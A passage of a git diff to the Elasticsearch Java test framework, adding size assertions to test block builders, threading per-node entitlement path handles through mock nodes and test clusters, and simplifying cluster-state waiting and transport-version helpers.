doublesFromDocValues(int expectedCount) { @Override public BlockLoader.DoubleBuilder doubles(int expectedCount) { class DoublesBuilder extends TestBlock.Builder implements BlockLoader.DoubleBuilder { + private DoublesBuilder() { + super(expectedCount); + } + @Override public DoublesBuilder appendDouble(double value) { add(value); @@ -81,6 +108,10 @@ public BlockLoader.FloatBuilder denseVectors(int expectedCount, int dimensions) class FloatsBuilder extends TestBlock.Builder implements BlockLoader.FloatBuilder { int numElements = 0; + private FloatsBuilder() { + super(expectedCount); + } + @Override public BlockLoader.FloatBuilder appendFloat(float value) { add(value); @@ -117,6 +148,10 @@ public BlockLoader.IntBuilder intsFromDocValues(int expectedCount) { @Override public BlockLoader.IntBuilder ints(int expectedCount) { class IntsBuilder extends TestBlock.Builder implements BlockLoader.IntBuilder { + private IntsBuilder() { 
+ super(expectedCount); + } + @Override public IntsBuilder appendInt(int value) { add(value); @@ -134,6 +169,10 @@ public BlockLoader.LongBuilder longsFromDocValues(int expectedCount) { @Override public BlockLoader.LongBuilder longs(int expectedCount) { class LongsBuilder extends TestBlock.Builder implements BlockLoader.LongBuilder { + private LongsBuilder() { + super(expectedCount); + } + @Override public LongsBuilder appendLong(long value) { add(value); @@ -149,26 +188,30 @@ public BlockLoader.Builder nulls(int expectedCount) { } @Override - public BlockLoader.Block constantNulls() { - BlockLoader.LongBuilder builder = longs(pageSize); - for (int i = 0; i < pageSize; i++) { + public BlockLoader.Block constantNulls(int count) { + BlockLoader.LongBuilder builder = longs(count); + for (int i = 0; i < count; i++) { builder.appendNull(); } return builder.build(); } @Override - public BlockLoader.Block constantBytes(BytesRef value) { - BlockLoader.BytesRefBuilder builder = bytesRefs(pageSize); - for (int i = 0; i < pageSize; i++) { + public BlockLoader.Block constantBytes(BytesRef value, int count) { + BlockLoader.BytesRefBuilder builder = bytesRefs(count); + for (int i = 0; i < count; i++) { builder.appendBytesRef(value); } return builder.build(); } @Override - public BlockLoader.SingletonOrdinalsBuilder singletonOrdinalsBuilder(SortedDocValues ordinals, int count) { + public BlockLoader.SingletonOrdinalsBuilder singletonOrdinalsBuilder(SortedDocValues ordinals, int expectedCount) { class SingletonOrdsBuilder extends TestBlock.Builder implements BlockLoader.SingletonOrdinalsBuilder { + private SingletonOrdsBuilder() { + super(expectedCount); + } + @Override public SingletonOrdsBuilder appendOrd(int value) { try { @@ -183,8 +226,8 @@ public SingletonOrdsBuilder appendOrd(int value) { } @Override - public BlockLoader.AggregateMetricDoubleBuilder aggregateMetricDoubleBuilder(int count) { - return new AggregateMetricDoubleBlockBuilder(); + public BlockLoader.AggregateMetricDoubleBuilder aggregateMetricDoubleBuilder(int expectedSize) { + return new AggregateMetricDoubleBlockBuilder(expectedSize); } }; } @@ -239,8 +282,14 @@ public void close() { private abstract static class Builder implements BlockLoader.Builder { private final List values = new ArrayList<>(); + private Matcher expectedSize; + private List currentPosition = null; + private Builder(int expectedSize) { + this.expectedSize = equalTo(expectedSize); + } + @Override public Builder appendNull() { assertNull(currentPosition); @@ -269,6 +318,7 @@ protected void add(Object value) { @Override public TestBlock build() { + assertThat(values, hasSize(expectedSize)); return new TestBlock(values); } @@ -283,12 +333,23 @@ public void close() { * The implementation here is fairly close to the production one. 
*/ private static class AggregateMetricDoubleBlockBuilder implements BlockLoader.AggregateMetricDoubleBuilder { - private final DoubleBuilder min = new DoubleBuilder(); - private final DoubleBuilder max = new DoubleBuilder(); - private final DoubleBuilder sum = new DoubleBuilder(); - private final IntBuilder count = new IntBuilder(); + private final DoubleBuilder min; + private final DoubleBuilder max; + private final DoubleBuilder sum; + private final IntBuilder count; + + private AggregateMetricDoubleBlockBuilder(int expectedSize) { + min = new DoubleBuilder(expectedSize); + max = new DoubleBuilder(expectedSize); + sum = new DoubleBuilder(expectedSize); + count = new IntBuilder(expectedSize); + } private static class DoubleBuilder extends TestBlock.Builder implements BlockLoader.DoubleBuilder { + private DoubleBuilder(int expectedSize) { + super(expectedSize); + } + @Override public BlockLoader.DoubleBuilder appendDouble(double value) { add(value); @@ -297,6 +358,10 @@ public BlockLoader.DoubleBuilder appendDouble(double value) { } private static class IntBuilder extends TestBlock.Builder implements BlockLoader.IntBuilder { + private IntBuilder(int expectedSize) { + super(expectedSize); + } + @Override public BlockLoader.IntBuilder appendInt(int value) { add(value); diff --git a/test/framework/src/main/java/org/elasticsearch/node/MockNode.java b/test/framework/src/main/java/org/elasticsearch/node/MockNode.java index 9a99b5c881941..3837aa4b426d4 100644 --- a/test/framework/src/main/java/org/elasticsearch/node/MockNode.java +++ b/test/framework/src/main/java/org/elasticsearch/node/MockNode.java @@ -24,6 +24,7 @@ import org.elasticsearch.common.util.MockBigArrays; import org.elasticsearch.common.util.MockPageCacheRecycler; import org.elasticsearch.common.util.PageCacheRecycler; +import org.elasticsearch.core.IOUtils; import org.elasticsearch.env.Environment; import org.elasticsearch.http.HttpServerTransport; import org.elasticsearch.indices.ExecutorSelector; @@ -53,10 +54,12 @@ import org.elasticsearch.transport.TransportService; import org.elasticsearch.transport.TransportSettings; +import java.io.Closeable; import java.nio.file.Path; import java.util.Collection; import java.util.Collections; import java.util.Map; +import java.util.concurrent.TimeUnit; import java.util.function.Function; import java.util.function.LongSupplier; @@ -232,40 +235,37 @@ protected HttpServerTransport newHttpTransport(PluginsService pluginsService, Ne private final Collection> classpathPlugins; + // handle for temporarily entitled node paths for this node; these will be removed on close. 
+ private final Closeable entitledNodePaths; + public MockNode(final Settings settings, final Collection> classpathPlugins) { - this(settings, classpathPlugins, true); + this(settings, classpathPlugins, true, () -> {}); } public MockNode( final Settings settings, final Collection> classpathPlugins, - final boolean forbidPrivateIndexSettings + final boolean forbidPrivateIndexSettings, + final Closeable entitledNodePaths ) { - this(settings, classpathPlugins, null, forbidPrivateIndexSettings); + this(settings, classpathPlugins, null, forbidPrivateIndexSettings, entitledNodePaths); } public MockNode( final Settings settings, final Collection> classpathPlugins, final Path configPath, - final boolean forbidPrivateIndexSettings + final boolean forbidPrivateIndexSettings, + final Closeable entitledNodePaths ) { - this( - InternalSettingsPreparer.prepareEnvironment( - Settings.builder().put(TransportSettings.PORT.getKey(), ESTestCase.getPortRange()).put(settings).build(), - Collections.emptyMap(), - configPath, - () -> "mock_ node" - ), - classpathPlugins, - forbidPrivateIndexSettings - ); + this(prepareEnvironment(settings, configPath), classpathPlugins, forbidPrivateIndexSettings, entitledNodePaths); } private MockNode( final Environment environment, final Collection> classpathPlugins, - final boolean forbidPrivateIndexSettings + final boolean forbidPrivateIndexSettings, + final Closeable entitledNodePaths ) { super(NodeConstruction.prepareConstruction(environment, null, new MockServiceProvider() { @@ -276,6 +276,25 @@ PluginsService newPluginService(Environment environment, PluginsLoader pluginsLo }, forbidPrivateIndexSettings)); this.classpathPlugins = classpathPlugins; + this.entitledNodePaths = entitledNodePaths; + } + + private static Environment prepareEnvironment(final Settings settings, final Path configPath) { + return InternalSettingsPreparer.prepareEnvironment( + Settings.builder().put(TransportSettings.PORT.getKey(), ESTestCase.getPortRange()).put(settings).build(), + Collections.emptyMap(), + configPath, + () -> "mock_ node" + ); + } + + @Override + public synchronized boolean awaitClose(long timeout, TimeUnit timeUnit) throws InterruptedException { + try { + return super.awaitClose(timeout, timeUnit); + } finally { + IOUtils.closeWhileHandlingException(entitledNodePaths); + } } /** diff --git a/test/framework/src/main/java/org/elasticsearch/search/DummyQueryBuilder.java b/test/framework/src/main/java/org/elasticsearch/search/DummyQueryBuilder.java index 43589ae606c28..bacde646260c1 100644 --- a/test/framework/src/main/java/org/elasticsearch/search/DummyQueryBuilder.java +++ b/test/framework/src/main/java/org/elasticsearch/search/DummyQueryBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.AbstractQueryBuilder; @@ -69,6 +68,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/test/framework/src/main/java/org/elasticsearch/search/aggregations/AggregatorTestCase.java b/test/framework/src/main/java/org/elasticsearch/search/aggregations/AggregatorTestCase.java index 5e451e2e79f10..0d89d40d982c5 100644 --- a/test/framework/src/main/java/org/elasticsearch/search/aggregations/AggregatorTestCase.java +++ 
b/test/framework/src/main/java/org/elasticsearch/search/aggregations/AggregatorTestCase.java @@ -52,7 +52,6 @@ import org.apache.lucene.util.NumericUtils; import org.apache.lucene.util.packed.PackedInts; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.OriginalIndices; import org.elasticsearch.action.search.SearchRequest; import org.elasticsearch.cluster.metadata.IndexMetadata; @@ -1619,7 +1618,7 @@ protected void doWriteTo(StreamOutput out) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/test/framework/src/main/java/org/elasticsearch/snapshots/AbstractSnapshotIntegTestCase.java b/test/framework/src/main/java/org/elasticsearch/snapshots/AbstractSnapshotIntegTestCase.java index 63e77cfdc4523..185a0494183b3 100644 --- a/test/framework/src/main/java/org/elasticsearch/snapshots/AbstractSnapshotIntegTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/snapshots/AbstractSnapshotIntegTestCase.java @@ -557,7 +557,7 @@ protected void addBwCFailedSnapshot(String repoName, String snapshotName, Map wait for [{}] deletions to show up in the cluster state", count); awaitClusterState(state -> SnapshotDeletionsInProgress.get(state).getEntries().size() == count); } @@ -569,7 +569,6 @@ protected void awaitNoMoreRunningOperations() throws Exception { protected void awaitNoMoreRunningOperations(String viaNode) throws Exception { logger.info("--> verify no more operations in the cluster state"); awaitClusterState( - logger, viaNode, state -> SnapshotsInProgress.get(state).isEmpty() && SnapshotDeletionsInProgress.get(state).hasDeletionsInProgress() == false ); @@ -604,13 +603,13 @@ public static ActionFuture startFullSnapshot( .execute(); } - protected void awaitNumberOfSnapshotsInProgress(int count) throws Exception { + protected void awaitNumberOfSnapshotsInProgress(int count) { awaitNumberOfSnapshotsInProgress(logger, count); } - public static void awaitNumberOfSnapshotsInProgress(Logger logger, int count) throws Exception { + public static void awaitNumberOfSnapshotsInProgress(Logger logger, int count) { logger.info("--> wait for [{}] snapshots to show up in the cluster state", count); - awaitClusterState(logger, state -> SnapshotsInProgress.get(state).count() == count); + awaitClusterState(state -> SnapshotsInProgress.get(state).count() == count); } protected SnapshotInfo assertSuccessful(ActionFuture future) throws Exception { diff --git a/test/framework/src/main/java/org/elasticsearch/test/AbstractMultiClustersTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/AbstractMultiClustersTestCase.java index b4f91f68b8bb7..8e2098f361b0b 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/AbstractMultiClustersTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/AbstractMultiClustersTestCase.java @@ -127,7 +127,8 @@ public final void startClusters() throws Exception { 0, clusterName + "-", mockPlugins, - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try { cluster.beforeTest(random()); diff --git a/test/framework/src/main/java/org/elasticsearch/test/AbstractSearchCancellationTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/AbstractSearchCancellationTestCase.java index d83cab3c7c205..5ecb2f24acb32 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/AbstractSearchCancellationTestCase.java +++ 
b/test/framework/src/main/java/org/elasticsearch/test/AbstractSearchCancellationTestCase.java @@ -26,7 +26,7 @@ import org.elasticsearch.rest.RestStatus; import org.elasticsearch.script.MockScriptPlugin; import org.elasticsearch.search.SearchService; -import org.elasticsearch.search.internal.ReaderContext; +import org.elasticsearch.search.internal.SearchContext; import org.elasticsearch.search.lookup.LeafStoredFieldsLookup; import org.elasticsearch.tasks.TaskInfo; import org.junit.BeforeClass; @@ -279,10 +279,10 @@ protected List initSearchShardBlockingPlugin() { } public static class SearchShardBlockingPlugin extends Plugin { - private final AtomicReference> runOnNewReaderContext = new AtomicReference<>(); + private final AtomicReference> runOnPreQueryPhase = new AtomicReference<>(); - public void setRunOnNewReaderContext(Consumer consumer) { - runOnNewReaderContext.set(consumer); + public void setRunOnPreQueryPhase(Consumer consumer) { + runOnPreQueryPhase.set(consumer); } @Override @@ -290,9 +290,9 @@ public void onIndexModule(IndexModule indexModule) { super.onIndexModule(indexModule); indexModule.addSearchOperationListener(new SearchOperationListener() { @Override - public void onNewReaderContext(ReaderContext c) { - if (runOnNewReaderContext.get() != null) { - runOnNewReaderContext.get().accept(c); + public void onPreQueryPhase(SearchContext c) { + if (runOnPreQueryPhase.get() != null) { + runOnPreQueryPhase.get().accept(c); } } }); diff --git a/test/framework/src/main/java/org/elasticsearch/test/BWCVersions.java b/test/framework/src/main/java/org/elasticsearch/test/BWCVersions.java index 1cd0d0ddc4cd2..77042953b6993 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/BWCVersions.java +++ b/test/framework/src/main/java/org/elasticsearch/test/BWCVersions.java @@ -10,7 +10,6 @@ package org.elasticsearch.test; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import java.util.NavigableSet; @@ -18,7 +17,7 @@ public final class BWCVersions { private BWCVersions() {} public static NavigableSet getAllBWCVersions() { - return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersions.MINIMUM_COMPATIBLE, true); + return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersion.minimumCompatible(), true); } public static final NavigableSet DEFAULT_BWC_VERSIONS = getAllBWCVersions(); diff --git a/test/framework/src/main/java/org/elasticsearch/test/ClusterServiceUtils.java b/test/framework/src/main/java/org/elasticsearch/test/ClusterServiceUtils.java index e0e7505191da9..e6ed4b489048a 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/ClusterServiceUtils.java +++ b/test/framework/src/main/java/org/elasticsearch/test/ClusterServiceUtils.java @@ -8,17 +8,14 @@ */ package org.elasticsearch.test; -import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.core.util.Throwables; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.action.ActionListener; -import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.action.support.SubscribableListener; import org.elasticsearch.cluster.ClusterChangedEvent; import org.elasticsearch.cluster.ClusterName; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.ClusterStateListener; -import org.elasticsearch.cluster.ClusterStateObserver; import org.elasticsearch.cluster.ClusterStatePublicationEvent; import org.elasticsearch.cluster.ClusterStateUpdateTask; import 
org.elasticsearch.cluster.NodeConnectionsService; @@ -37,14 +34,12 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.core.TimeValue; -import org.elasticsearch.node.NodeClosedException; import org.elasticsearch.tasks.TaskManager; import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.threadpool.ThreadPool; import java.util.Collections; import java.util.concurrent.CountDownLatch; -import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicReference; import java.util.function.Predicate; @@ -219,33 +214,8 @@ public static void setAllElapsedMillis(ClusterStatePublicationEvent clusterState clusterStatePublicationEvent.setMasterApplyElapsedMillis(0L); } - public static void awaitClusterState(Logger logger, Predicate statePredicate, ClusterService clusterService) - throws Exception { - final PlainActionFuture future = new PlainActionFuture<>(); - ClusterStateObserver.waitForState( - clusterService, - clusterService.getClusterApplierService().threadPool().getThreadContext(), - new ClusterStateObserver.Listener() { - @Override - public void onNewClusterState(ClusterState state) { - future.onResponse(null); - } - - @Override - public void onClusterServiceClose() { - future.onFailure(new NodeClosedException(clusterService.localNode())); - } - - @Override - public void onTimeout(TimeValue timeout) { - assert false : "onTimeout called with no timeout set"; - } - }, - statePredicate, - null, - logger - ); - future.get(30L, TimeUnit.SECONDS); + public static void awaitClusterState(Predicate statePredicate, ClusterService clusterService) { + ESTestCase.safeAwait(addTemporaryStateListener(clusterService, statePredicate, TimeValue.THIRTY_SECONDS), TimeValue.THIRTY_SECONDS); } public static void awaitNoPendingTasks(ClusterService clusterService) { diff --git a/test/framework/src/main/java/org/elasticsearch/test/ESIntegTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/ESIntegTestCase.java index afbabe110aa4e..1bf5e7d307777 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/ESIntegTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/ESIntegTestCase.java @@ -17,7 +17,6 @@ import com.carrotsearch.randomizedtesting.generators.RandomPicks; import org.apache.http.HttpHost; -import org.apache.logging.log4j.Logger; import org.apache.lucene.search.Sort; import org.apache.lucene.search.TotalHits; import org.apache.lucene.tests.util.LuceneTestCase; @@ -548,6 +547,7 @@ private TestCluster buildAndPutCluster(Scope currentClusterScope, long seed) thr // close the previous one and create a new one if (testCluster != null) { IOUtils.closeWhileHandlingException(testCluster::close); + TEST_ENTITLEMENTS.revokeAllEntitledNodePaths(); } testCluster = buildTestCluster(currentClusterScope, seed); } @@ -1206,16 +1206,12 @@ public static PendingClusterTasksResponse getClusterPendingTasks(Client client) } } - protected void awaitClusterState(Predicate statePredicate) throws Exception { - awaitClusterState(logger, internalCluster().getMasterName(), statePredicate); + public static void awaitClusterState(Predicate statePredicate) { + awaitClusterState(internalCluster().getMasterName(), statePredicate); } - public static void awaitClusterState(Logger logger, Predicate statePredicate) throws Exception { - awaitClusterState(logger, internalCluster().getMasterName(), statePredicate); - } - - public static void awaitClusterState(Logger logger, String viaNode, 
Predicate<ClusterState> statePredicate) throws Exception {
-        ClusterServiceUtils.awaitClusterState(logger, statePredicate, internalCluster().getInstance(ClusterService.class, viaNode));
+    public static void awaitClusterState(String viaNode, Predicate<ClusterState> statePredicate) {
+        ClusterServiceUtils.awaitClusterState(statePredicate, internalCluster().getInstance(ClusterService.class, viaNode));
     }
 
     public static String getNodeId(String nodeName) {
@@ -2326,7 +2322,8 @@ protected TestCluster buildTestCluster(Scope scope, long seed) throws IOExceptio
             getClientWrapper(),
             forbidPrivateIndexSettings(),
             forceSingleDataPath(),
-            autoManageVotingExclusions()
+            autoManageVotingExclusions(),
+            TEST_ENTITLEMENTS::addEntitledNodePaths
         );
     }
diff --git a/test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java
index 7ebc5765bda63..53214590e4a60 100644
--- a/test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java
+++ b/test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java
@@ -288,7 +288,7 @@ private Node newNode() {
             plugins.add(ConcurrentSearchTestPlugin.class);
         }
         plugins.add(MockScriptService.TestPlugin.class);
-        Node node = new MockNode(settings, plugins, forbidPrivateIndexSettings());
+        Node node = new MockNode(settings, plugins, forbidPrivateIndexSettings(), TEST_ENTITLEMENTS.addEntitledNodePaths(settings, null));
         try {
             node.start();
         } catch (NodeValidationException e) {
diff --git a/test/framework/src/main/java/org/elasticsearch/test/ESTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/ESTestCase.java
index 7183a43c6f731..add06432b4faa 100644
--- a/test/framework/src/main/java/org/elasticsearch/test/ESTestCase.java
+++ b/test/framework/src/main/java/org/elasticsearch/test/ESTestCase.java
@@ -111,6 +111,7 @@
 import org.elasticsearch.core.SuppressForbidden;
 import org.elasticsearch.core.TimeValue;
 import org.elasticsearch.core.Tuple;
+import org.elasticsearch.entitlement.bootstrap.TestEntitlementsRule;
 import org.elasticsearch.env.Environment;
 import org.elasticsearch.env.NodeEnvironment;
 import org.elasticsearch.env.TestEnvironment;
@@ -158,12 +159,18 @@
 import org.junit.AfterClass;
 import org.junit.Before;
 import org.junit.BeforeClass;
+import org.junit.ClassRule;
 import org.junit.Rule;
 import org.junit.internal.AssumptionViolatedException;
 import org.junit.rules.RuleChain;
 
 import java.io.IOException;
 import java.io.InputStream;
+import java.lang.annotation.ElementType;
+import java.lang.annotation.Inherited;
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
 import java.lang.invoke.MethodHandles;
 import java.math.BigInteger;
 import java.net.InetAddress;
@@ -492,6 +499,35 @@ protected void afterIfFailed(List<Throwable> errors) {}
 
     /** called after a test is finished, but only if successful */
     protected void afterIfSuccessful() throws Exception {}
 
+    /**
+     * Marks a test suite or a test method that should run without checking for entitlements.
+     */
+    @Retention(RetentionPolicy.RUNTIME)
+    @Target(ElementType.TYPE)
+    @Inherited
+    public @interface WithoutEntitlements {
+    }
+
+    /**
+     * Marks a test suite or a test method that enforces entitlements on the test code itself.
+     * Useful for testing the enforcement of entitlements; for any other test cases, this probably isn't what you want.
+ */ + @Retention(RetentionPolicy.RUNTIME) + @Target(ElementType.TYPE) + @Inherited + public @interface WithEntitlementsOnTestCode { + } + + @Retention(RetentionPolicy.RUNTIME) + @Target(ElementType.TYPE) + @Inherited + public @interface EntitledTestPackages { + String[] value(); + } + + @ClassRule + public static final TestEntitlementsRule TEST_ENTITLEMENTS = new TestEntitlementsRule(); + // setup mock filesystems for this test run. we change PathUtils // so that all accesses are plumbed thru any mock wrappers diff --git a/test/framework/src/main/java/org/elasticsearch/test/InternalAggregationTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/InternalAggregationTestCase.java index 5feb79c16bb24..38cccb4070349 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/InternalAggregationTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/InternalAggregationTestCase.java @@ -10,7 +10,6 @@ package org.elasticsearch.test; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamOutput; @@ -425,7 +424,7 @@ public BucketCardinality bucketCardinality() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/test/framework/src/main/java/org/elasticsearch/test/InternalTestCluster.java b/test/framework/src/main/java/org/elasticsearch/test/InternalTestCluster.java index 904e53d9af418..453cddd504364 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/InternalTestCluster.java +++ b/test/framework/src/main/java/org/elasticsearch/test/InternalTestCluster.java @@ -179,6 +179,14 @@ */ public final class InternalTestCluster extends TestCluster { + /** + * Temporarily adds node paths based entitlements based on a node's {@code settings} and {@code configPath} + * until the returned handle is closed. 
+ */ + public interface EntitledNodePathsProvider { + Closeable addEntitledNodePaths(Settings settings, Path configPath); + } + private static final Logger logger = LogManager.getLogger(InternalTestCluster.class); private static final Predicate<DiscoveryNode> DATA_NODE_PREDICATE = new Predicate<>() { @@ -278,6 +286,8 @@ public String toString() { // index of node to bootstrap as master, or BOOTSTRAP_MASTER_NODE_INDEX_AUTO or BOOTSTRAP_MASTER_NODE_INDEX_DONE private int bootstrapMasterNodeIndex = BOOTSTRAP_MASTER_NODE_INDEX_AUTO; + private final EntitledNodePathsProvider entitledNodePathsProvider; + public InternalTestCluster( final long clusterSeed, final Path baseDir, @@ -290,7 +300,8 @@ public InternalTestCluster( final int numClientNodes, final String nodePrefix, final Collection<Class<? extends Plugin>> mockPlugins, - final Function<Client, Client> clientWrapper + final Function<Client, Client> clientWrapper, + EntitledNodePathsProvider entitledNodePathsProvider ) { this( clusterSeed, @@ -307,7 +318,8 @@ public InternalTestCluster( clientWrapper, true, false, - true + true, + entitledNodePathsProvider ); } @@ -326,7 +338,8 @@ public InternalTestCluster( final Function<Client, Client> clientWrapper, final boolean forbidPrivateIndexSettings, final boolean forceSingleDataPath, - final boolean autoManageVotingExclusions + final boolean autoManageVotingExclusions, + final EntitledNodePathsProvider entitledNodePathsProvider ) { super(clusterSeed); this.autoManageMasterNodes = autoManageMasterNodes; @@ -335,6 +348,7 @@ public InternalTestCluster( this.baseDir = baseDir; this.clusterName = clusterName; this.autoManageVotingExclusions = autoManageVotingExclusions; + this.entitledNodePathsProvider = entitledNodePathsProvider; if (minNumDataNodes < 0 || maxNumDataNodes < 0) { throw new IllegalArgumentException("minimum and maximum number of data nodes must be >= 0"); } @@ -783,7 +797,14 @@ private synchronized NodeAndClient buildNode(int nodeId, Settings settings, bool // we clone this here since in the case of a node restart we might need it again secureSettings = ((MockSecureSettings) secureSettings).clone(); } - MockNode node = new MockNode(settings, plugins, nodeConfigurationSource.nodeConfigPath(nodeId), forbidPrivateIndexSettings); + Path configPath = nodeConfigurationSource.nodeConfigPath(nodeId); + MockNode node = new MockNode( + settings, + plugins, + configPath, + forbidPrivateIndexSettings, + entitledNodePathsProvider.addEntitledNodePaths(settings, configPath) + ); node.injector().getInstance(TransportService.class).addLifecycleListener(new LifecycleListener() { @Override public void afterStart() { @@ -1058,7 +1079,12 @@ private void recreateNode(final Settings newSettings, final Runnable onTransport .put(NodeEnvironment.NODE_ID_SEED_SETTING.getKey(), newIdSeed) .build(); Collection<Class<? extends Plugin>> plugins = node.getClasspathPlugins(); - node = new MockNode(finalSettings, plugins, forbidPrivateIndexSettings); + node = new MockNode( + finalSettings, + plugins, + forbidPrivateIndexSettings, + entitledNodePathsProvider.addEntitledNodePaths(finalSettings, null) + ); node.injector().getInstance(TransportService.class).addLifecycleListener(new LifecycleListener() { @Override public void afterStart() { @@ -2038,7 +2064,7 @@ public String getMasterName(@Nullable String viaNode) { throw new AssertionError("Unable to get master name, no node found"); } try { - ClusterServiceUtils.awaitClusterState(logger, state -> state.nodes().getMasterNode() != null, clusterService(viaNode)); + ClusterServiceUtils.awaitClusterState(state -> state.nodes().getMasterNode() != null, clusterService(viaNode)); final
ClusterState state = client(viaNode).admin().cluster().prepareState(TEST_REQUEST_TIMEOUT).setLocal(true).get().getState(); final DiscoveryNode masterNode = state.nodes().getMasterNode(); if (masterNode == null) { diff --git a/test/framework/src/main/java/org/elasticsearch/test/TransportVersionUtils.java b/test/framework/src/main/java/org/elasticsearch/test/TransportVersionUtils.java index 9c7114425b8db..1f68ff19f6b2b 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/TransportVersionUtils.java +++ b/test/framework/src/main/java/org/elasticsearch/test/TransportVersionUtils.java @@ -10,7 +10,6 @@ package org.elasticsearch.test; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.core.Nullable; import java.util.Collections; @@ -40,7 +39,7 @@ public static TransportVersion getFirstVersion() { /** Returns a random {@link TransportVersion} from all available versions. */ public static TransportVersion randomVersion() { - return VersionUtils.randomFrom(random(), allReleasedVersions(), TransportVersion::fromId); + return VersionUtils.randomFrom(random(), allReleasedVersions()); } /** Returns a random {@link TransportVersion} from all available versions without the ignore set */ @@ -50,7 +49,7 @@ public static TransportVersion randomVersion(Set ignore) { /** Returns a random {@link TransportVersion} from all available versions. */ public static TransportVersion randomVersion(Random random) { - return VersionUtils.randomFrom(random, allReleasedVersions(), TransportVersion::fromId); + return VersionUtils.randomFrom(random, allReleasedVersions()); } /** Returns a random {@link TransportVersion} between minVersion and maxVersion (inclusive). */ @@ -77,7 +76,7 @@ public static TransportVersion randomVersionBetween( versions = versions.headSet(maxVersion, true); } - return VersionUtils.randomFrom(random, versions, TransportVersion::fromId); + return VersionUtils.randomFrom(random, versions); } public static TransportVersion getPreviousVersion() { @@ -113,6 +112,6 @@ public static TransportVersion getNextVersion(TransportVersion version, boolean /** Returns a random {@code TransportVersion} that is compatible with {@link TransportVersion#current()} */ public static TransportVersion randomCompatibleVersion(Random random) { - return randomVersionBetween(random, TransportVersions.MINIMUM_COMPATIBLE, TransportVersion.current()); + return randomVersionBetween(random, TransportVersion.minimumCompatible(), TransportVersion.current()); } } diff --git a/test/framework/src/main/java/org/elasticsearch/test/VersionUtils.java b/test/framework/src/main/java/org/elasticsearch/test/VersionUtils.java index 311f032088f74..a9953f2208a75 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/VersionUtils.java +++ b/test/framework/src/main/java/org/elasticsearch/test/VersionUtils.java @@ -9,7 +9,7 @@ package org.elasticsearch.test; -import com.carrotsearch.randomizedtesting.generators.RandomNumbers; +import com.carrotsearch.randomizedtesting.generators.RandomPicks; import org.elasticsearch.Build; import org.elasticsearch.Version; @@ -21,7 +21,6 @@ import java.util.NavigableSet; import java.util.Random; import java.util.TreeSet; -import java.util.function.IntFunction; /** Utilities for selecting versions in tests */ public class VersionUtils { @@ -77,7 +76,7 @@ public static Version getFirstVersion() { /** Returns a random {@link Version} from all available versions. 
*/ public static Version randomVersion(Random random) { - return randomFrom(random, ALL_VERSIONS, Version::fromId); + return randomFrom(random, ALL_VERSIONS); } /** Returns a random {@link Version} from all available versions, that is compatible with the given version. */ @@ -106,7 +105,7 @@ public static Version randomVersionBetween(Random random, @Nullable Version minV versions = versions.headSet(maxVersion, true); } - return randomFrom(random, versions, Version::fromId); + return randomFrom(random, versions); } /** Returns the maximum {@link Version} that is compatible with the given version. */ @@ -114,16 +113,7 @@ public static Version maxCompatibleVersion(Version version) { return ALL_VERSIONS.tailSet(version, true).descendingSet().stream().filter(version::isCompatible).findFirst().orElseThrow(); } - public static <T extends VersionId<T>> T randomFrom(Random random, NavigableSet<T> set, IntFunction<T> ctor) { - // get the first and last id, pick a random id in the middle, then find that id in the set in O(nlogn) time - // this assumes the id numbers are reasonably evenly distributed in the set - assert set.isEmpty() == false; - int lowest = set.getFirst().id(); - int highest = set.getLast().id(); - - T randomId = ctor.apply(RandomNumbers.randomIntBetween(random, lowest, highest)); - // try to find the id below, then the id above. We're just looking for *some* item in the set that is close to randomId - T found = set.floor(randomId); - return found != null ? found : set.ceiling(randomId); + public static <T extends VersionId<T>> T 